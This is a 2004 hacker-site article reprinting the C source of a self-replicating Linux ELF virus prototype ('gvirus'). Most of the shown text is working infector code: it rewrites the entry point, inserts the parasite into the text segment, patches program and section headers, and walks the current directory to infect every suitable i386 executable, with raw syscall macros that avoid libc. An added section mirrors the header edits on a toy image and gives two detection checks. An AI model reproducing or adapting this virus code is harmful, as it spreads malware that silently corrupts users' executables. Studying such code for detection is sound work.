An Analysis of a Linux Virus Prototype
Author: grip2    Source: CnXHacker.Net    Updated: 2004-12-23
/* Tail of infect_virus(file, v_code, v_code_size, v_retaddr_addr_offset),
 * continued from the previous page.  Every string the parasite needs is
 * built as a char array on the stack, byte by byte, so that the compiler
 * never emits a pointer into .rodata: the code has to stay self-contained
 * once it is copied into a foreign binary. */
int tmp_flag;
int size;
unsigned char tmp_v_code[PAGE_SIZE];   /* staging buffer for one page of parasite */

/* Fixed, predictable scratch path in /tmp; the rewritten host is assembled
 * here and then renamed over the original. */
char tmpfile[32] = {'/','t','m','p','/','.','g','v','i','r','u','s','\0'};

#ifndef NDEBUG
char err_type[32] = {'f','i','l','e',' ','t','y','p','e',' ','n','o','t',' ',
's','u','p','p','o','r','t','e','d','\n','\0'};
char luck[32] = {'B','e','t','t','e','r',' ','l','u','c','k',' ',
'n','e','x','t',' ','f','i','l','e','\n','\0'};
#endif

fd = g_open(file, O_RDWR, 0);
if (fd == -1) {
goto err;
}

if (g_fstat(fd, &stat) == -1) {
goto err;
}

/* Map the whole file read/write.  The header edits below are made in the
 * mapping and copied out to the temporary file.  MAP_PRIVATE keeps them in
 * this process's copy; with MAP_SHARED (as originally written) a failure
 * between the edits and the final rename would leave the host with a moved
 * entry point and no parasite behind it. */
ehdr = g_mmap2(0, stat.st_size, PROT_WRITE|PROT_READ, MAP_PRIVATE, fd, 0);
if (ehdr == MAP_FAILED) {
ehdr = NULL;   /* MAP_FAILED is (void *) -1, not NULL: keep err: from unmapping it */
goto err;
}

/* Check ELF magic-ident: only little-endian 32-bit i386 ET_EXEC binaries
 * qualify; shared objects, other architectures and non-ELF names handed in
 * by the directory walk are rejected here */
if (ehdr->e_ident[EI_MAG0] != 0x7f
|| ehdr->e_ident[EI_MAG1] != 'E'
|| ehdr->e_ident[EI_MAG2] != 'L'
|| ehdr->e_ident[EI_MAG3] != 'F'
|| ehdr->e_ident[EI_CLASS] != ELFCLASS32
|| ehdr->e_ident[EI_DATA] != ELFDATA2LSB
|| ehdr->e_ident[EI_VERSION] != EV_CURRENT
|| ehdr->e_type != ET_EXEC
|| ehdr->e_machine != EM_386
|| ehdr->e_version != EV_CURRENT
) {
V_DEBUG_WRITE(1, &err_type, sizeof(err_type));
goto err;
}

/* Round the parasite up to whole pages.  Every later file offset is shifted
 * by this amount, and a page multiple keeps p_offset congruent to p_vaddr
 * modulo the page size, which the loader requires of PT_LOAD segments. */
align_code_size = PAGE_ALIGN(v_code_size);

/* Get program header and section header start address */
phdr = (Elf32_Phdr *) ((unsigned long) ehdr + ehdr->e_phoff);
shdr = (Elf32_Shdr *) ((unsigned long) ehdr + ehdr->e_shoff);

/* Locate the text segment: the first PT_LOAD whose flags are exactly R+X.
 * It must be followed by another program header, because the padded
 * parasite has to fit in the address gap before the next segment's p_vaddr;
 * a text segment that is the last program header is never infected. */
txt_index = 0;
while (1) {
if (txt_index == ehdr->e_phnum - 1)
goto err;

if (phdr[txt_index].p_type == PT_LOAD
&& phdr[txt_index].p_flags == (PF_R|PF_X)) { /* text segment */
if (phdr[txt_index].p_vaddr + phdr[txt_index].p_filesz + align_code_size
> phdr[txt_index+1].p_vaddr) {
V_DEBUG_WRITE(1, &luck, sizeof(luck)); /* no room: leave this file alone */
goto err;
}

break;
}
txt_index++;
}

/* Modify the entry point of the ELF: execution now starts at the first byte
 * past the text segment's current file image, where the parasite goes.
 * org_entry is patched into the parasite below so it can jump back. */
org_entry = ehdr->e_entry;
ehdr->e_entry = phdr[txt_index].p_vaddr + phdr[txt_index].p_filesz;

new_code_pos =
(void *) ehdr + phdr[txt_index].p_offset + phdr[txt_index].p_filesz;

/* Increase the p_filesz and p_memsz of text segment
* for new code */
phdr[txt_index].p_filesz += align_code_size;
phdr[txt_index].p_memsz += align_code_size;

/* Everything stored after the insertion point moves down by one aligned
 * block: program headers first, then section headers.  e_phoff is left
 * alone, so the program header table is assumed to sit directly behind the
 * ELF header, ahead of the insertion point. */
for (i = 0; i < ehdr->e_phnum; i++)
if (phdr[i].p_offset >= (unsigned long) new_code_pos - (unsigned long) ehdr)
phdr[i].p_offset += align_code_size;

/* The section just before the first shifted one, i.e. the last section of
 * the text segment, is widened to cover the parasite so tools that walk
 * sections see no unaccounted gap. */
tmp_flag = 0;
for (i = 0; i < ehdr->e_shnum; i++) {
if (shdr[i].sh_offset >= (unsigned long) new_code_pos - (unsigned long) ehdr) {
shdr[i].sh_offset += align_code_size;
if (!tmp_flag && i) { /* associating the new_code to the last
* section in the text segment */
shdr[i-1].sh_size += align_code_size;
tmp_flag = 1;
}
}
}

/* Increase e_shoff in the ELF header: the section header table itself lies
 * past the insertion point */
ehdr->e_shoff += align_code_size;

/* Make a new file: the original bytes up to the insertion point, one
 * aligned block of parasite, then the rest of the original.  The temporary
 * file is created with the target's mode and renamed over it afterwards. */
tmp_fd = g_open(tmpfile, O_WRONLY|O_CREAT|O_TRUNC, stat.st_mode);
if (tmp_fd == -1) {
goto err;
}

size = new_code_pos - (void *) ehdr;
if (g_write(tmp_fd, ehdr, size) != size)
goto err;

/* Stage the parasite and patch the host's original entry point into the
 * placeholder at v_retaddr_addr_offset (the 0xAABBCCDD in virus_code()).
 * This assumes v_code_size <= PAGE_SIZE; the unused tail of tmp_v_code is
 * uninitialised stack and is written into the host as padding. */
__memcpy(tmp_v_code, v_code, v_code_size);
__memcpy(tmp_v_code + v_retaddr_addr_offset, &org_entry, sizeof(org_entry));
if (g_write(tmp_fd, tmp_v_code, align_code_size) != align_code_size) {
goto err;
}

if (g_write(tmp_fd, (void *) ehdr + size, stat.st_size - size)
!= stat.st_size - size) {
goto err;
}

g_close(tmp_fd);
g_munmap(ehdr, stat.st_size);
g_close(fd);
/* Mark everything released so a failed rename does not close it twice in err: */
tmp_fd = -1;
ehdr = NULL;
fd = -1;

if (g_rename(tmpfile, file) == -1) {
goto err;
}

return 0;
err:
if (tmp_fd != -1)
g_close(tmp_fd);
if (ehdr)
g_munmap(ehdr, stat.st_size);
if (fd != -1)
g_close(fd);
return -1;
}

/* Body of the parasite.  Once grafted it runs before the host's original
 * entry point, so it saves the registers it touches and unwinds its own
 * stack frame by hand before jumping back into the host. */
static inline void virus_code(void)
{
char dirdata[4096];
struct dirent *dirp;
int curfd;
int nbyte, c;
unsigned long para_code_start_addr;

/* Preserve the caller-saved registers the host's startup code may rely on */
__asm__ volatile (
"push %%eax\n\t"
"push %%ecx\n\t"
"push %%edx\n\t"
::);

/* Built on the stack and then re-assigned byte by byte so the compiler has
 * no reason to keep the bytes in .rodata (same idea as tmpfile above). */
char curdir[2] = {'.', 0};
char newline = '\n';

curdir[0] = '.';
curdir[1] = 0;
newline = '\n';

if ((curfd = g_open(curdir, O_RDONLY, 0)) < 0)
goto out;

/* Get start address of virus code.  Jump forward to "call infect_start";
 * the call pushes the address of the "return:" label, which is popped here.
 * That label is the push of the 0xAABBCCDD placeholder, whose 4-byte
 * immediate lies one byte in, at PARACODE_RETADDR_ADDR_OFFSET from the
 * start of the parasite; subtracting that distance yields the parasite's
 * own load address without ever assuming a fixed one. */
__asm__ volatile (
"jmp get_start_addr\n"
"infect_start:\n\t"
"popl %0\n\t"
:"=m" (para_code_start_addr)
:);
para_code_start_addr -= PARACODE_RETADDR_ADDR_OFFSET - 1;

/* Infecting: hand every name in the current directory to infect_virus(),
 * which rejects anything that is not a suitable i386 ELF executable.
 * g_getdents fills dirdata with packed, variable-length dirent records. */
while ((nbyte = g_getdents(curfd, (struct dirent *)
&dirdata, sizeof(dirdata))) > 0) {
c = 0;
dirp = (struct dirent *) &dirdata;
do {
V_DEBUG_WRITE(1, dirp->d_name, dirp->d_reclen - (unsigned long)
&(((struct dirent *) 0)->d_name));
V_DEBUG_WRITE(1, &newline, sizeof(newline));

infect_virus(dirp->d_name,
(void *) para_code_start_addr,
PARACODE_LENGTH,
PARACODE_RETADDR_ADDR_OFFSET);

c += dirp->d_reclen;
if (c >= nbyte)
break;
dirp = (struct dirent *)((char *)dirp + dirp->d_reclen);
} while (1);
}
g_close(curfd);
out:
/* Hand-rolled epilogue: restore eax/ecx/edx, discard this function's
 * automatics (0x102c bytes, most of it dirdata) and the callee-saved
 * registers the compiler pushed, then jump over the address-finding stub to
 * "return:", which pushes the host's original entry point and returns into
 * it.  0xAABBCCDD is the placeholder infect_virus() overwrites with
 * org_entry.  The 0x102c constant and the pop order match one specific
 * compiler frame layout; a different gcc version or optimisation level
 * silently breaks the jump back into the host. */
__asm__ volatile (
"popl %%edx\n\t"
"popl %%ecx\n\t"
"popl %%eax\n\t"
"addl $0x102c, %%esp\n\t"
"popl %%ebx\n\t"
"popl %%esi\n\t"
"popl %%edi\n\t"
"popl %%ebp\n\t"
"jmp return\n"
"get_start_addr:\n\t"
"call infect_start\n"
"return:\n\t"
"push $0xAABBCCDD\n\t" /* push ret_addr */
"ret\n"
::);
}

/* parasite_code() is the unit actually copied into hosts (virus_code is
 * inlined into it); parasite_code_end() follows it in .text and serves as
 * the end marker for measuring the parasite image. */
void parasite_code(void)
{
virus_code();
}
void parasite_code_end(void) {parasite_code();}
------------------------------ gvirus.c ------------------------------
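The header surgery that infect_virus() performs, reproduced on a toy ELF32 image and followed by two checks a scanner can apply to the result. This is an added example, not part of the original article or its source: the image layout (a 0x1800-byte R+X text segment holding .text then .rodata, followed by an R+W data segment at a page-congruent address), the 700-byte parasite size and all function names are assumptions of the example, and no parasite code is ever executed.

```c
/* Added example, not the article's code: infect_virus()'s header edits
 * applied to a constructed in-memory ELF32 image, then two checks a scanner
 * could run on the result.  Layout (addresses, section order, sizes) is an
 * assumption modelled on a small static i386 executable; no code behind it. */
#include <elf.h>
#include <stdint.h>
#include <string.h>

#define PAGE_SIZE 4096u
#define PAGE_ALIGN(x) (((x) + PAGE_SIZE - 1) & ~(PAGE_SIZE - 1))
enum { NPHDR = 2, NSHDR = 4 };   /* sections: SHN_UNDEF, .text, .rodata, .data */
struct image { Elf32_Ehdr ehdr; Elf32_Phdr phdr[NPHDR]; Elf32_Shdr shdr[NSHDR]; };

/* Clean host: R+X text segment, file 0..0x1800 at 0x08048000, holding .text
 * then .rodata; R+W data segment at file 0x1800 mapped at 0x0804b800. */
void build_clean_image(struct image *im)
{
    Elf32_Ehdr *e = &im->ehdr;
    memset(im, 0, sizeof *im);
    memcpy(e->e_ident, ELFMAG, SELFMAG);
    e->e_ident[EI_CLASS] = ELFCLASS32; e->e_ident[EI_DATA] = ELFDATA2LSB;
    e->e_ident[EI_VERSION] = EV_CURRENT;
    e->e_type = ET_EXEC; e->e_machine = EM_386; e->e_version = EV_CURRENT;
    e->e_phoff = sizeof(Elf32_Ehdr); e->e_phnum = NPHDR;
    e->e_shoff = 0x3000; e->e_shnum = NSHDR;
    e->e_entry = 0x08048100;                       /* inside .text */
    im->phdr[0] = (Elf32_Phdr){ .p_type = PT_LOAD, .p_flags = PF_R | PF_X, .p_offset = 0,
                                .p_vaddr = 0x08048000, .p_filesz = 0x1800, .p_memsz = 0x1800 };
    im->phdr[1] = (Elf32_Phdr){ .p_type = PT_LOAD, .p_flags = PF_R | PF_W, .p_offset = 0x1800,
                                .p_vaddr = 0x0804b800, .p_filesz = 0x800, .p_memsz = 0x800 };
    im->shdr[1] = (Elf32_Shdr){ .sh_type = SHT_PROGBITS, .sh_flags = SHF_ALLOC | SHF_EXECINSTR,
                                .sh_addr = 0x08048080, .sh_offset = 0x80, .sh_size = 0x1000 };
    im->shdr[2] = (Elf32_Shdr){ .sh_type = SHT_PROGBITS, .sh_flags = SHF_ALLOC,
                                .sh_addr = 0x08049080, .sh_offset = 0x1080, .sh_size = 0x780 };
    im->shdr[3] = (Elf32_Shdr){ .sh_type = SHT_PROGBITS, .sh_flags = SHF_ALLOC | SHF_WRITE,
                                .sh_addr = 0x0804b800, .sh_offset = 0x1800, .sh_size = 0x800 };
}

/* Mirror of infect_virus(): entry moved to the end of the text segment's file
 * image, segment grown by a page-aligned block, later offsets pushed down,
 * last text section widened.  Returns -1 where the prototype gives up. */
int infect_headers(struct image *im, uint32_t v_code_size)
{
    Elf32_Ehdr *e = &im->ehdr; Elf32_Phdr *p = im->phdr; Elf32_Shdr *s = im->shdr;
    uint32_t align = PAGE_ALIGN(v_code_size), insert_at;
    int t = -1, grown = 0;
    for (int i = 0; i + 1 < e->e_phnum; i++)     /* text segment needs a successor */
        if (p[i].p_type == PT_LOAD && p[i].p_flags == (PF_R | PF_X)) { t = i; break; }
    if (t < 0 || p[t].p_vaddr + p[t].p_filesz + align > p[t + 1].p_vaddr)
        return -1;                                 /* padded code would not fit */
    insert_at = p[t].p_offset + p[t].p_filesz;
    e->e_entry = p[t].p_vaddr + p[t].p_filesz;
    p[t].p_filesz += align; p[t].p_memsz += align;
    for (int i = 0; i < e->e_phnum; i++)
        if (p[i].p_offset >= insert_at) p[i].p_offset += align;
    for (int i = 0; i < e->e_shnum; i++)
        if (s[i].sh_offset >= insert_at) {
            s[i].sh_offset += align;
            if (!grown && i) { s[i - 1].sh_size += align; grown = 1; }
        }
    e->e_shoff += align;
    return 0;
}

/* Check 1: index of the SHF_EXECINSTR section covering e_entry, or -1.  The
 * grafted bytes extend whichever section ended the text segment (.rodata
 * here), so the entry no longer falls inside executable section data. */
int entry_exec_section(const struct image *im)
{
    uint32_t entry = im->ehdr.e_entry;
    for (int i = 1; i < im->ehdr.e_shnum; i++) {
        const Elf32_Shdr *s = &im->shdr[i];
        if ((s->sh_flags & SHF_EXECINSTR) && entry >= s->sh_addr && entry - s->sh_addr < s->sh_size)
            return i;
    }
    return -1;
}

/* Check 2: e_entry a whole number of pages before the end of an executable
 * segment's file image, the footprint PAGE_ALIGN'd insertion leaves. */
int entry_in_text_tail(const struct image *im)
{
    uint32_t entry = im->ehdr.e_entry;
    for (int i = 0; i < im->ehdr.e_phnum; i++) {
        const Elf32_Phdr *p = &im->phdr[i];
        uint32_t end = p->p_vaddr + p->p_filesz;
        if (p->p_type == PT_LOAD && (p->p_flags & PF_X) && entry >= p->p_vaddr
            && entry < end && (end - entry) % PAGE_SIZE == 0)
            return 1;
    }
    return 0;
}

/* Clean image -> infection -> checks; 0 if all expectations held, else the
 * number of the first failed step.  700 bytes of parasite round up to one page. */
int run_demo(void)
{
    struct image im;
    build_clean_image(&im);
    if (entry_exec_section(&im) != 1 || entry_in_text_tail(&im) != 0) return 1;
    if (infect_headers(&im, 700) != 0 || im.ehdr.e_entry != 0x08049800u) return 2;
    if (im.phdr[0].p_filesz != 0x2800u || im.phdr[1].p_offset != 0x2800u) return 3;
    if (im.shdr[2].sh_size != 0x1780u || im.shdr[3].sh_offset != 0x2800u) return 4;
    if (im.ehdr.e_shoff != 0x4000u) return 5;
    if (entry_exec_section(&im) != -1 || entry_in_text_tail(&im) != 1) return 6;
    return 0;
}
```

run_demo() walks the clean image through the same steps the prototype takes and returns 0 once both checks fire on the result. Check 1 depends on the host's section order: had .text itself been the last section of the text segment, the widened section would still be executable and only check 2 would trigger. Check 2 can also match a legitimate binary whose entry point happens to sit a page multiple before the end of its text image, so treat either hit as a reason to look closer rather than a verdict.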

------------------------------ gunistd.h ------------------------------
/* gunistd.h: private copies of the kernel's legacy _syscallN macros under a
 * g_ prefix, so the parasite issues raw int $0x80 calls and never references
 * libc (nothing from the host's libraries can be relied on). */
#ifndef _G2_UNISTD_
#define _G2_UNISTD_

/* The kernel returns -errno in eax; values in the top 125 are errors.  They
 * are folded into -1 and the errno value itself is discarded. */
#define g__syscall_return(type, res) \
do { \
if ((unsigned long)(res) >= (unsigned long)(-125)) { \
res = -1; \
} \
return (type) (res); \
} while (0)

#define g_syscall0(type,name) \
type g_##name(void) \
{ \
long __res; \
__asm__ volatile ("int $0x80" \
: "=a" (__res) \
: "0" (__NR_##name)); \
g__syscall_return(type,__res); \
}

#define g_syscall1(type,name,type1,arg1) \
type g_##name(type1 arg1) \
{ \
long __res; \
__asm__ volatile ("int $0x80" \
: "=a" (__res) \
: "0" (__NR_##name),"b" ((long)(arg1))); \
g__syscall_return(type,__res); \
}

#define g_syscall2(type,name,type1,arg1,type2,arg2) \
type g_##name(type1 arg1,type2 arg2) \
{ \
long __res; \
__asm__ volatile ("int $0x80" \
: "=a" (__res) \
: "0" (__NR_##name),"b" ((long)(arg1)),"c" ((long)(arg2))); \
g__syscall_return(type,__res); \
}

#define g_syscall3(type,name,type1,arg1,type2,arg2,type3,arg3) \
type g_##name(type1 arg1,type2 arg2,type3 arg3) \
{ \
long __res; \
__asm__ volatile ("int $0x80" \
: "=a" (__res) \
: "0" (__NR_##name),"b" ((long)(arg1)),"c" ((long)(arg2)), \
"d" ((long)(arg3))); \
g__syscall_return(type,__res); \
}

#define g_syscall4(type,name,type1,arg1,type2,arg2,type3,arg3,type4,arg4) \
type g_##name (type1 arg1, type2 arg2, type3 arg3, type4 arg4) \
{ \
long __res; \
__asm__ volatile ("int $0x80" \
: "=a" (__res) \
: "0" (__NR_##name),"b" ((long)(arg1)),"c" ((long)(arg2)), \
"d" ((long)(arg3)),"S" ((long)(arg4))); \
g__syscall_return(type,__res); \
}

#define g_syscall5(type,name,type1,arg1,type2,arg2,type3,arg3,type4,arg4, \
type5,arg5) \
type g_##name (type1 arg1,type2 arg2,type3 arg3,type4 arg4,type5 arg5) \
{ \
long __res; \
__asm__ volatile ("int $0x80" \
: "=a" (__res) \
: "0" (__NR_##name),"b" ((long)(arg1)),"c" ((long)(arg2)), \
"d" ((long)(arg3)),"S" ((long)(arg4)),"D" ((long)(arg5))); \
g__syscall_return(type,__res); \
}

/* Six arguments: the sixth travels in ebp, which cannot be named in a gcc
 * constraint, so it is passed in eax, moved into ebp by hand and the syscall
 * number is then loaded from an immediate. */
#define g_syscall6(type,name,type1,arg1,type2,arg2,type3,arg3,type4,arg4, \
type5,arg5,type6,arg6) \
type g_##name (type1 arg1,type2 arg2,type3 arg3,type4 arg4,type5 arg5,type6 arg6) \
{ \
long __res; \
__asm__ volatile ("push %%ebp ; movl %%eax,%%ebp ; movl %1,%%eax ; int $0x80 ; pop %%ebp" \
: "=a" (__res) \
: "i" (__NR_##name),"b" ((long)(arg1)),"c" ((long)(arg2)), \
"d" ((long)(arg3)),"S" ((long)(arg4)),"D" ((long)(arg5)), \
"0" ((long)(arg6))); \
g__syscall_return(type,__res); \
}

#endif /* _G2_UNISTD_ */
------------------------------ gunistd.h ------------------------------

------------------------------ gsyscall.h ------------

Entered by: IceRiver    Editor: IceRiver